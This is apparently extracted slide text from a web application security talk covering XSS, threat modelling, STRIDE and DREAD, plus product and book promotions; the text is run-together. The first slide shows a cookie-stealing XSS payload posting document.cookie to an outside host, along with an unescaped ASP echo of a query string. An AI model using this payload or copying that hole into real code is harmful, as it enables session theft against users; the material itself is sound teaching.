12XSS – How it Works Hello, <% =Request.QueryString(“name”) %> If Request.Form(“cookie”) <> “” Thendata = Request.Form(“cookie”)‘ Do whatever I want with the cookieEnd IfResponse.Redirect<FORM action=http://www.b.com/gather.asp method=post id=“idForm”> <INPUT name=“cookie” type=“hidden”> </FORM> <SCRIPT> idForm.cookie.value=document.cookie; idForm.submit(); </SCRIPT>The Bad URL
The Bad URL.",
23Identifying Assets 1 What is it that you want to protect? Private data (e.g., customer list)Proprietary data (e.g., intellectual property)Potentially injurious data (e.g., credit card numbers, decryption keys)These also count as "assets"Integrity of back-end databasesIntegrity of the Web pages (no defacement)Integrity of other machines on the networkAvailability of the application
24Documenting Architecture 2Define what the app does and how it's usedUsers view pages with catalog itemsUsers perform searches for catalog itemsUsers add items to shopping cartsUsers check outDiagram the applicationShow subsystemsShow data flowList assets
26Decomposing the App 3 Refine the architecture diagram Show authentication mechanismsShow authorization mechanismsShow technologies (e.g., DPAPI)Diagram trust boundariesIdentify entry pointsBegin to think like an attackerWhere are my vulnerabilities?What am I going to do about them?
29STRIDE Spoofing S Tampering T Repudiation R Information disclosure I Can an attacker gain access using a false identity?TamperingTCan an attacker modify data as it flows through the application?RepudiationRIf an attacker denies an exploit, can you prove him or her wrong?Information disclosureICan an attacker gain access to private or potentially injurious data?Denial of serviceDCan an attacker crash or reduce the availiability of the system?Elevation of privilegeECan an attacker assume the identity of a privileged user?
33DREAD Damage potential D Reproducibility R Exploitability E What are the consequences of a successful exploit?RReproducibilityWould an exploit work every time or only under certain circumstances?EExploitabilityHow skilled must an attacker be to exploit the vulnerability?AAffected usersHow many users would be affected by a successful exploit?DDiscoverabilityHow likely is it that an attacker will know the vulnerability exists?
37Microsoft Developer Network Patterns and Practices Guides
38SafeApps™ Secure Code Assurance (SCA) engine Replaces a manual security code expert code reviewer in a box.Detects the programming errors that lead to security vulnerabilities. Assists in remediating the errors.Detects programming errors that lead to viruses and wormsPrioritizes risk of each error from severe error to warning. Optimizes programmer’s time.Guides the programmer to fix the source of error. Most programmers don’t know how to fix security errors.Target userDeveloper, QA Engineer, Security EngineerDevelopment teams that use SafeApps can drastically reduce the number of vulnerabilities in their software.
39Resources/Next StepsNGSCB is part of the Longhorn SDKAsk your hardware and software vendors what NGSCB-enabled components they will provideVisit our site and read the white papers and specsSend questions to our Q&A aliasSign up for updatesSubscribe to the NGSCB information newsletter for ongoing updates. Send blank to:
40Purchase and review at: http://www.asp.net/whidbey ASP.NET Whidbey BookNow available for PDC bits13 Chapters, 470 PagesTopics CoveredIntroduction, Tools & Architecture, Data Source Controls and Data Binding, GridView & DetailsView Controls, Master Pages & Navigation, Security, Personalization & Themes, Web Parts, Mobile Device Support, SQL Cache Invalidation, Precompilation, Confuguration & Administration and more.Purchase and review at: